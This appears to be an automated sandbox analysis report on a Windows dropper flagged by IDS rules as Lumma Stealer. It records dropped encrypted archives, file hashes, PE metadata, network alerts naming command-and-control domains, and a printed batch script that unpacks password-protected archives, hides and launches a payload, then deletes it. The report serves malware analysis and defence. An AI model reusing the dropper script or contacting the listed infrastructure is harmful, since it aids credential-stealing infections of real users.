Preview:	PK..........uY4;..~...~......file_2.zipPK..........uYB..r+~..+~......file_1.zipPK..........uY.)^..}..8.......Installer.exe.\}`.....K.pa...1.)A...4........)..&..i<.R......9.f8.....R.....?J/.&.........5J...l.o..H.....\|.y.f.....Zr...!I...iJ.^...H...c..I...$=9....V.\|.........Ol.....o..U.m....w..]~c...w.[.UzzZv...W..6.....in.W..X.."..W. .....{E.M.......~u.h..k......UD.......S.U.....:.._.)....6..V....^.n.h.4K...~u.(.=.&.&.F...KR....Qu....?...@..-...s.{..u..q.......S......j....v....6....!.,..k..........Ab..x..$.r.u.....!9.{._1.q........e..G....>...j..M.#...1K.....\|...y7.1v1.....S..n.......+A.&...{..Y.3(..`P.:[B.dg.2.<..A......7".v6 ,....V....f..U.....l9.u...J.......g.....t.i....S..m.H...1...E.J..+b.Rl,z....G)L?..... ...,..T..O.....@...5.......$....j,+.`.+b.oc;...X..,"U...&.6.f...J......].2.+...)...R...B.=....L.u........l....S.=..:....6..@t;.r...w..d..(bA..fAJ....q...u.....0:.......'...1...=A)...s6S.y.q<.[..N!.c.J.....f$.......@3..%Ic."f..X

C:\Users\user\AppData\Local\Temp\main\extracted\file_4.zip

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	2426095
Entropy (8bit):	7.998404992730004
Encrypted:	true
SSDEEP:	49152:LujCK3D0AC/l5mwbBkDWYb1ZN4UJ9oKcl7RgtGYr/2:LaR3D0Ae5mwdkDWm1XoKcl7+t92
MD5:	6E04EFEE8E6DF916933215D9AABAE042
SHA1:	1F6FAEFE1DA576D29F842702504D4EF721D62998
SHA-256:	C41E5D3DD6F0A2FEABAC65CEC0E483FE88447C11B6AED134813F7D0597EDACA4
SHA-512:	2CB413CCBD45BF4AD593AE023DC8C33442CF86E075C902389C933CB03F2F31D5242C348FEAFE0108437D1A99AB19E3D053C26990E01BA806066093AB212E7E85
Malicious:	false
Preview:	PK..........uY..4.p.....#.....AntiAV.data..E..@.D..C/qwg..;...mG.3H..\|...$..}.`..8......lV1..4...Cu.H.(l+{Cl.:........$+Nr....\.u.K_1N:k.'....F...... .....+.70..R.>..A..#6L.:..n..7......Y..y......v.,....=...e....fe.4.@...h..+....=.#...T......A..\|...{A.p{.b*.\|.[...Q...z.v.....iD.....W.....;...........YVL._._.F..4./g;syC.....e,.N..>t.43..p.T4?.K.....:Z.XDVS.gj.)cp..A9.7^.d.M.d.j..c:.(T<J._3-..8.,."s.'...B\.q...\..e.!..{l.\.]'.P.2}..l@^.G...{n..p..u.n.1;W..#..p.A.YD7.....,.o..z;.6T../.w..=.3K5..]............U...,r....n....(..I.....Q.o%.NF..Q.h$y.".7.tU..eVe.b.q.S4%"C..$g..iX..XQl..?Z.U.\|.g....&.d..Y.\|..5O...s.\|..A..@.Y1F.o.o.s.'UY.AU#....D.K.....A....=t.M..L4...{.....BF.Rg.-...j..p.c..'.2....].m..w37t...Rn.r....v....W..g0E......)-.6.=v/.9...o..~.mh.U.&...5.ld4k.gG.G.S.w4G..]'.5......r..Q.U.U.9.Vv....2.>....p.s.p..e....(..}Jox.....Z..[Y..ku.....5....s.././....:...v......h.u.ZlG.>).,.(....Ye<.....3...:T:)...-).=.L.=.2F....&H7..j..\.B6.Ox.\....

C:\Users\user\AppData\Local\Temp\main\file.bin

Process:	C:\Users\user\Desktop\file.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	2426261
Entropy (8bit):	7.999913059933208
Encrypted:	true
SSDEEP:	49152:2L5CKmkotjbkJKDog57WlBE5Q8auyAuifhjqIdPh4tGpx6ge:o5CjbkeUPE5YaPfhquJ4tu3e
MD5:	20696D307F6B19D3094724A2C845551B
SHA1:	04DFC0D64983F8834D382025C870777D93855FE9
SHA-256:	666BD2360B3750697BFC114EBC1E43604B25659B8A865EB2F24D5C358D1880BB
SHA-512:	A2AF70EAEF93AB608D84D09A984F0A52076D7F430F504178E34028CA6D7745E772BEC9AAD7F2BEC584E11C86CD429E05844B1C0596804F54FB1758FB15965FE1
Malicious:	false
Preview:	PK..........uY.....%...%.....file_4.zip.).zsS..../ .....6.7...MUQ:;)$.cl....{..'....D-O.KR..(...KS.........]%$.t8....W.U..%...9...\....;.P.\:u..R.+.)'.....m......Ui.G.)...W..M..R....nG......9x}}...O.)..$.S..e5....-..<.F....0Z\|..x.......x..R...{..w..).XxP...2...bt...a. ..(5....3P..~.1.Ba.H.%2.OS..R#......0=......R....f..Z..+e.....^f.P.)...Da.P^.;S......F.I.FNcD.F..E...^.N.H.1.\|u....+..S....T..,.j...7e..J.....aFE..?.].L....g5.....&..^W..=.......O........D.."4..;...m.4.=....W.....Y..h..6.[c.=.E.xyN...z".z...lQG\|..l}tr...6f....!...U.yg....a.Q....c.r.'@........Q..U..&Ez..V.z...]>M...U.].x..Uh...]..fm....Mz.u....+O..-....G,..B:...D.......&.]...........K@...TGf.^....\\...=?.V\8....K..S~.w...&".5RU...........w4~.r.Y.U.VH.Zxy\.=-..`.....#.[....q-.X.ei.X..L] C....Vk.>....Oc...Z.@A`......!K..=.,&.....m........K...A..Z.........I]..[<..bh....s.R....#8.s...- :.%.../.GO.{..F........2.f.(..aFuNT..p\.Kd6.9)?.j\.\..ys@B..%.......0..C.....<i....{..0.M..

C:\Users\user\AppData\Local\Temp\main\file.zip (copy)

Process:	C:\Windows\System32\cmd.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	2426261
Entropy (8bit):	7.999913059933208
Encrypted:	true
SSDEEP:	49152:2L5CKmkotjbkJKDog57WlBE5Q8auyAuifhjqIdPh4tGpx6ge:o5CjbkeUPE5YaPfhquJ4tu3e
MD5:	20696D307F6B19D3094724A2C845551B
SHA1:	04DFC0D64983F8834D382025C870777D93855FE9
SHA-256:	666BD2360B3750697BFC114EBC1E43604B25659B8A865EB2F24D5C358D1880BB
SHA-512:	A2AF70EAEF93AB608D84D09A984F0A52076D7F430F504178E34028CA6D7745E772BEC9AAD7F2BEC584E11C86CD429E05844B1C0596804F54FB1758FB15965FE1
Malicious:	false
Preview:	PK..........uY.....%...%.....file_4.zip.).zsS..../ .....6.7...MUQ:;)$.cl....{..'....D-O.KR..(...KS.........]%$.t8....W.U..%...9...\....;.P.\:u..R.+.)'.....m......Ui.G.)...W..M..R....nG......9x}}...O.)..$.S..e5....-..<.F....0Z\|..x.......x..R...{..w..).XxP...2...bt...a. ..(5....3P..~.1.Ba.H.%2.OS..R#......0=......R....f..Z..+e.....^f.P.)...Da.P^.;S......F.I.FNcD.F..E...^.N.H.1.\|u....+..S....T..,.j...7e..J.....aFE..?.].L....g5.....&..^W..=.......O........D.."4..;...m.4.=....W.....Y..h..6.[c.=.E.xyN...z".z...lQG\|..l}tr...6f....!...U.yg....a.Q....c.r.'@........Q..U..&Ez..V.z...]>M...U.].x..Uh...]..fm....Mz.u....+O..-....G,..B:...D.......&.]...........K@...TGf.^....\\...=?.V\8....K..S~.w...&".5RU...........w4~.r.Y.U.VH.Zxy\.=-..`.....#.[....q-.X.ei.X..L] C....Vk.>....Oc...Z.@A`......!K..=.,&.....m........K...A..Z.........I]..[<..bh....s.R....#8.s...- :.%.../.GO.{..F........2.f.(..aFuNT..p\.Kd6.9)?.j\.\..ys@B..%.......0..C.....<i....{..0.M..

C:\Users\user\AppData\Local\Temp\main\main.bat

Process:	C:\Users\user\Desktop\file.exe
File Type:	Unicode text, UTF-16, little-endian text, with no line terminators
Category:	dropped
Size (bytes):	474
Entropy (8bit):	5.0920186757800545
Encrypted:	false
SSDEEP:	12:QUp+CF16g64CTFMj2LIQLv2u2W+CVGrMLvmuCCgXjgrXgX78agXrrEOXUigXY:QUpNF16g632CkeuW+CVGYTtS0rXS78as
MD5:	B14620F36E8D77E3A1BB6A92121E3279
SHA1:	BCA0B9FCD9571794ED27087EDC1E777964263768
SHA-256:	45A58F7A7CC5A7BFE8C5B7D1FCAC799C9B6CD5B7CC07ADB7A517FCCA512451B8
SHA-512:	B4C2D995527CC7D5909A9141D3D74DCD86C7CD74448A572298BF3D537A2527A5B36C45E725D2A14770CECE73617D58E7ECD7CFD8D1060DFF10CAAFDB1A141F1A
Malicious:	false
Preview:	..&cls..@echo off..mode 65,10..title g3g34g34g34g43 (34g34g45h6hj56j56j)..md extracted..ren file.bin file.zip..call 7z.exe e file.zip -p1299923009167529232566422481 -oextracted ..for /l %%i in (4,-1,1) do (..call 7z.exe e extracted/file_%%i.zip -oextracted..)..ren file.zip file.bin..cd extracted..move "Installer.exe" ../..cd....rd /s /q extracted..attrib +H "Installer.exe"..start "" "Installer.exe"..cls..echo Launched 'Installer.exe'...pause..del /f /q "Installer.exe"..

\Device\ConDrv

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	345
Entropy (8bit):	5.081543932238743
Encrypted:	false
SSDEEP:	6:AMMyS3pt+uoQcAxXF2SaioBKFSTgqF1AivwtHgN1Ffpap1tNZTe:pMpDh5RwXfTgqFyYwsJA1tNw
MD5:	E06A9F5D5632CE2FB131A885580E1BDF
SHA1:	BB2348087381D375857ECC8F6A93BCC3DA961936
SHA-256:	DFB78CB4FB72B09F98864B1823B33A53EF90CF29AE3F842509AB829A647DEEAB
SHA-512:	E5C584911C7BA58E8361611A602F037EA0EB9B7D5FD449FEE48463F85B72FB6282FA94A9DFF5002B9F0560716F10735CE456154E6094D55FD23950461BB562F8
Malicious:	false
Preview:	..7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21....Scanning the drive for archives:.. 0M Scan. .1 file, 753195 bytes (736 KiB)....Extracting archive: extracted\file_1.zip..--..Path = extracted\file_1.zip..Type = zip..Physical Size = 753195.... 0%. .Everything is Ok....Size: 918840..Compressed: 753195..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.991693232431377
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	3'376'184 bytes
MD5:	b570fcbe697ef79db835d9b654974874
SHA1:	cf82bcfafbd35a42a4cb7893b4acae9941ee9f5a
SHA256:	34255258fadbcfaa0d061722ae85b5e25bcc3b90f2f10825b75d0cb4f27e1a8b
SHA512:	4226fd46a072458e4520a5db5849ed1d38fe2d960a9ffe1a91aa6db079110dc69c5648e32deb0da9f9c139d8fa59ca2a324748405b390fd29ae48ef78bbd8470
SSDEEP:	98304:hQ5YSVL1XX+63mAEQXoODvgikZmYYwlLCbm1ty7Of9fIES:hQxX5fEQ4KI4YYkLCbUtysO
TLSH:	5DF53393776E80B5F04661763CD5BBE922E0EA258F26C5C3C7596D0CEE903C528B91CB
File Content Preview:	MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L....?.O............................_.............@.................................iE4..............................................0...O..........PD3..?.

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General

Entrypoint:	0x41945f
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:
Time Stamp:	0x4FC33FCE [Mon May 28 09:05:18 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f6baa5eaa8231d4fe8e922a2e6d240ea

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Ballda Company, E=Ballda Company, O=Ballda Company, L=Ballda Company, C=BR
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	12/11/2024 19:00:00 12/11/2026 19:00:00
Subject Chain	CN=Ballda Company, E=Ballda Company, O=Ballda Company, L=Ballda Company, C=BR
Version:	3
Thumbprint MD5:	68B6357951E516EE8E2058916B2B8605
Thumbprint SHA-1:	EAEF924D8294423B4E5BBCFEFC74DE57BCC8800F
Thumbprint SHA-256:	360814DB207B223D092443B89DBED00982EDBB3C33C2CE6D943869C241F8CE6A
Serial:	0ACF735D55B327A6

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
push FFFFFFFFh
push 0041C480h
push 004195F0h
mov eax, dword ptr fs:[00000000h]
push eax
mov dword ptr fs:[00000000h], esp
sub esp, 68h
push ebx
push esi
push edi
mov dword ptr [ebp-18h], esp
xor ebx, ebx
mov dword ptr [ebp-04h], ebx
push 00000002h
call dword ptr [0041A1E0h]
pop ecx
or dword ptr [00422DE4h], FFFFFFFFh
or dword ptr [00422DE8h], FFFFFFFFh
call dword ptr [0041A1E4h]
mov ecx, dword ptr [00420DCCh]
mov dword ptr [eax], ecx
call dword ptr [0041A1E8h]
mov ecx, dword ptr [00420DC8h]
mov dword ptr [eax], ecx
mov eax, dword ptr [0041A1ECh]
mov eax, dword ptr [eax]
mov dword ptr [00422DE0h], eax
call 00007FD729435BD2h
cmp dword ptr [0041E950h], ebx
jne 00007FD729435ABEh
push 004195E8h
call dword ptr [0041A1F0h]
pop ecx
call 00007FD729435BA4h
push 0041E070h
push 0041E06Ch
call 00007FD729435B8Fh
mov eax, dword ptr [00420DC4h]
mov dword ptr [ebp-6Ch], eax
lea eax, dword ptr [ebp-6Ch]
push eax
push dword ptr [00420DC0h]
lea eax, dword ptr [ebp-64h]
push eax
lea eax, dword ptr [ebp-70h]
push eax
lea eax, dword ptr [ebp-60h]
push eax
call dword ptr [0041A1F8h]
push 0041E068h
push 0041E000h
call 00007FD729435B5Ch

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1c984	0xc8	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x23000	0x4f10	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x334450	0x3fe8
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1a000	0x36c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x18e0e	0x19000	e0f514ea8a1fc2a6d0def6d885d7282f	False	0.6029296875	data	6.656006728000525	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x1a000	0x3bda	0x3c00	d084871adc0cd9263e4a1811b8fc40fa	False	0.45553385416666664	data	5.725242374702596	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1e000	0x4dec	0xa00	8c42b68006a121b1b9ebd199e2e59ca5	False	0.50546875	data	4.442014356812219	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x23000	0x4f10	0x5000	8e87ec874b331d45ea1bc29c4dd625ae	False	0.101171875	data	3.928210125043096	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x231c0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	Russian	Russia	0.0975177304964539
RT_ICON	0x23628	0x9b8	Device independent bitmap graphic, 24 x 48 x 32, image size 2448	Russian	Russia	0.10008038585209003
RT_ICON	0x23fe0	0x1128	Device independent bitmap graphic, 32 x 64 x 32, image size 4352	Russian	Russia	0.061930783242258654
RT_ICON	0x25108	0x2668	Device independent bitmap graphic, 48 x 96 x 32, image size 9792	Russian	Russia	0.04017493897477624
RT_GROUP_ICON	0x27770	0x3e	data	Russian	Russia	0.8387096774193549
RT_VERSION	0x277b0	0x418	data			0.46087786259541985
RT_MANIFEST	0x27bc8	0x346	ASCII text, with CRLF line terminators	English	United States	0.5071599045346062

Imports

DLL	Import
COMCTL32.dll
SHELL32.dll	SHGetSpecialFolderPathW, ShellExecuteW, SHGetMalloc, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteExW
GDI32.dll	CreateCompatibleDC, CreateFontIndirectW, DeleteObject, DeleteDC, GetCurrentObject, StretchBlt, GetDeviceCaps, CreateCompatibleBitmap, SelectObject, SetStretchBltMode, GetObjectW
ADVAPI32.dll	FreeSid, AllocateAndInitializeSid, CheckTokenMembership
USER32.dll	GetWindowLongW, GetMenu, SetWindowPos, GetWindowDC, ReleaseDC, GetDlgItem, GetParent, GetWindowRect, GetClassNameA, CreateWindowExW, SetTimer, GetMessageW, DispatchMessageW, KillTimer, DestroyWindow, SendMessageW, EndDialog, wsprintfW, GetWindowTextW, GetWindowTextLengthW, GetSysColor, wsprintfA, SetWindowTextW, MessageBoxA, ScreenToClient, GetClientRect, SetWindowLongW, UnhookWindowsHookEx, SetFocus, GetSystemMetrics, SystemParametersInfoW, ShowWindow, DrawTextW, GetDC, ClientToScreen, GetWindow, DialogBoxIndirectParamW, DrawIconEx, CallWindowProcW, DefWindowProcW, CallNextHookEx, PtInRect, SetWindowsHookExW, LoadImageW, LoadIconW, MessageBeep, EnableWindow, IsWindow, EnableMenuItem, GetSystemMenu, CreateWindowExA, wvsprintfW, CharUpperW, GetKeyState, CopyImage
ole32.dll	CreateStreamOnHGlobal, CoCreateInstance, CoInitialize
OLEAUT32.dll	VariantClear, SysFreeString, OleLoadPicture, SysAllocString
KERNEL32.dll	GetFileSize, SetFilePointer, ReadFile, WaitForMultipleObjects, GetModuleHandleA, SetFileTime, SetEndOfFile, LeaveCriticalSection, EnterCriticalSection, DeleteCriticalSection, FormatMessageW, lstrcpyW, LocalFree, IsBadReadPtr, GetSystemDirectoryW, GetCurrentThreadId, SuspendThread, TerminateThread, InitializeCriticalSection, ResetEvent, SetEvent, CreateEventW, GetVersionExW, GetModuleFileNameW, GetCurrentProcess, SetProcessWorkingSetSize, SetCurrentDirectoryW, GetDriveTypeW, CreateFileW, GetCommandLineW, GetStartupInfoW, CreateProcessW, CreateJobObjectW, ResumeThread, AssignProcessToJobObject, CreateIoCompletionPort, SetInformationJobObject, GetQueuedCompletionStatus, GetExitCodeProcess, CloseHandle, SetEnvironmentVariableW, GetTempPathW, GetSystemTimeAsFileTime, lstrlenW, CompareFileTime, SetThreadLocale, FindFirstFileW, DeleteFileW, FindNextFileW, FindClose, RemoveDirectoryW, ExpandEnvironmentStringsW, WideCharToMultiByte, VirtualAlloc, GlobalMemoryStatusEx, lstrcmpW, GetEnvironmentVariableW, lstrcmpiW, lstrlenA, GetLocaleInfoW, MultiByteToWideChar, GetUserDefaultUILanguage, GetSystemDefaultUILanguage, GetSystemDefaultLCID, lstrcmpiA, GlobalAlloc, GlobalFree, MulDiv, FindResourceExA, SizeofResource, LoadResource, LockResource, LoadLibraryA, GetProcAddress, GetModuleHandleW, ExitProcess, lstrcatW, GetDiskFreeSpaceExW, SetFileAttributesW, SetLastError, Sleep, GetExitCodeThread, WaitForSingleObject, CreateThread, GetLastError, SystemTimeToFileTime, GetLocalTime, GetFileAttributesW, CreateDirectoryW, WriteFile, GetStdHandle, VirtualFree, GetStartupInfoA
MSVCRT.dll	??3@YAXPAX@Z, ??2@YAPAXI@Z, memcmp, free, memcpy, _wtol, _controlfp, _except_handler3, __set_app_type, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _initterm, __getmainargs, _acmdln, exit, _XcptFilter, _exit, ??1type_info@@UAE@XZ, _onexit, __dllonexit, _CxxThrowException, _beginthreadex, _EH_prolog, ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z, memset, _wcsnicmp, strncmp, wcsncmp, malloc, memmove, _purecall

Possible Origin

Language of compilation system	Country where language is spoken	Map
Russian	Russia
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-22T05:02:06.219890+0100	2057668	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (processhol .sbs)	1	192.168.2.5	63123	1.1.1.1	53	UDP
2024-11-22T05:02:06.219890+0100	2057697	ET MALWARE Observed DNS Query to Lumma Stealer Domain (processhol .sbs)	1	192.168.2.5	63123	1.1.1.1	53	UDP
2024-11-22T05:02:06.453678+0100	2057658	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (librari-night .sbs)	1	192.168.2.5	49817	1.1.1.1	53	UDP
2024-11-22T05:02:08.103646+0100	2057659	ET MALWARE Observed Win32/Lumma Stealer Related Domain (librari-night .sbs in TLS SNI)	1	192.168.2.5	49707	172.67.206.172	443	TCP
2024-11-22T05:02:08.103646+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49707	172.67.206.172	443	TCP
2024-11-22T05:02:08.832943+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49707	172.67.206.172	443	TCP
2024-11-22T05:02:08.832943+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49707	172.67.206.172	443	TCP
2024-11-22T05:02:10.178731+0100	2057659	ET MALWARE Observed Win32/Lumma Stealer Related Domain (librari-night .sbs in TLS SNI)	1	192.168.2.5	49708	172.67.206.172	443	TCP
2024-11-22T05:02:10.178731+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49708	172.67.206.172	443	TCP
2024-11-22T05:02:11.039904+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.5	49708	172.67.206.172	443	TCP
2024-11-22T05:02:11.039904+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49708	172.67.206.172	443	TCP
2024-11-22T05:02:12.507354+0100	2057659	ET MALWARE Observed Win32/Lumma Stealer Related Domain (librari-night .sbs in TLS SNI)	1	192.168.2.5	49709	172.67.206.172	443	TCP
2024-11-22T05:02:12.507354+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49709	172.67.206.172	443	TCP
2024-11-22T05:02:14.687563+0100	2057659	ET MALWARE Observed Win32/Lumma Stealer Related Domain (librari-night .sbs in TLS SNI)	1	192.168.2.5	49710	172.67.206.172	443	TCP
2024-11-22T05:02:14.687563+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49710	172.67.206.172	443	TCP
2024-11-22T05:02:16.846185+0100	2057659	ET MALWARE Observed Win32/Lumma Stealer Related Domain (librari-night .sbs in TLS SNI)	1	192.168.2.5	49712	172.67.206.172	443	TCP
2024-11-22T05:02:16.846185+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49712	172.67.206.172	443	TCP
2024-11-22T05:02:19.116598+0100	2057659	ET MALWARE Observed Win32/Lumma Stealer Related Domain (librari-night .sbs in TLS SNI)	1	192.168.2.5	49715	172.67.206.172	443	TCP
2024-11-22T05:02:19.116598+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49715	172.67.206.172	443	TCP
2024-11-22T05:02:19.848871+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.5	49715	172.67.206.172	443	TCP
2024-11-22T05:02:21.483449+0100	2057659	ET MALWARE Observed Win32/Lumma Stealer Related Domain (librari-night .sbs in TLS SNI)	1	192.168.2.5	49723	172.67.206.172	443	TCP
2024-11-22T05:02:21.483449+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49723	172.67.206.172	443	TCP
2024-11-22T05:02:21.488972+0100	2843864	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2	1	192.168.2.5	49723	172.67.206.172	443	TCP
2024-11-22T05:02:25.011304+0100	2057659	ET MALWARE Observed Win32/Lumma Stealer Related Domain (librari-night .sbs in TLS SNI)	1	192.168.2.5	49736	172.67.206.172	443	TCP
2024-11-22T05:02:25.011304+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49736	172.67.206.172	443	TCP
2024-11-22T05:02:25.786239+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49736	172.67.206.172	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 22, 2024 05:02:04.626348972 CET	49706	80	192.168.2.5	176.9.162.205
Nov 22, 2024 05:02:04.746296883 CET	80	49706	176.9.162.205	192.168.2.5
Nov 22, 2024 05:02:04.747570038 CET	49706	80	192.168.2.5	176.9.162.205
Nov 22, 2024 05:02:04.747885942 CET	49706	80	192.168.2.5	176.9.162.205
Nov 22, 2024 05:02:04.867670059 CET	80	49706	176.9.162.205	192.168.2.5
Nov 22, 2024 05:02:06.126864910 CET	80	49706	176.9.162.205	192.168.2.5
Nov 22, 2024 05:02:06.126904964 CET	80	49706	176.9.162.205	192.168.2.5
Nov 22, 2024 05:02:06.127017021 CET	49706	80	192.168.2.5	176.9.162.205
Nov 22, 2024 05:02:06.127017021 CET	49706	80	192.168.2.5	176.9.162.205
Nov 22, 2024 05:02:06.139235973 CET	49706	80	192.168.2.5	176.9.162.205
Nov 22, 2024 05:02:06.139276028 CET	49706	80	192.168.2.5	176.9.162.205
Nov 22, 2024 05:02:06.832542896 CET	49707	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:06.832660913 CET	443	49707	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:06.832762003 CET	49707	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:06.834054947 CET	49707	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:06.834093094 CET	443	49707	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:08.103427887 CET	443	49707	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:08.103646040 CET	49707	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:08.107949018 CET	49707	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:08.107960939 CET	443	49707	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:08.108366966 CET	443	49707	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:08.151329041 CET	49707	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:08.151362896 CET	49707	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:08.151483059 CET	443	49707	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:08.832950115 CET	443	49707	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:08.833067894 CET	443	49707	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:08.833134890 CET	49707	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:08.834789991 CET	49707	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:08.834813118 CET	443	49707	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:08.834829092 CET	49707	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:08.834836006 CET	443	49707	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:08.913088083 CET	49708	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:08.913196087 CET	443	49708	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:08.913280964 CET	49708	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:08.913646936 CET	49708	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:08.913683891 CET	443	49708	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:10.178519011 CET	443	49708	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:10.178730965 CET	49708	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:10.180102110 CET	49708	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:10.180130959 CET	443	49708	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:10.180478096 CET	443	49708	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:10.181843996 CET	49708	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:10.181885958 CET	49708	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:10.181955099 CET	443	49708	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:11.039880991 CET	443	49708	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:11.039928913 CET	443	49708	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:11.039968014 CET	443	49708	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:11.039992094 CET	49708	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:11.040018082 CET	443	49708	172.67.206.172	192.168.2.5
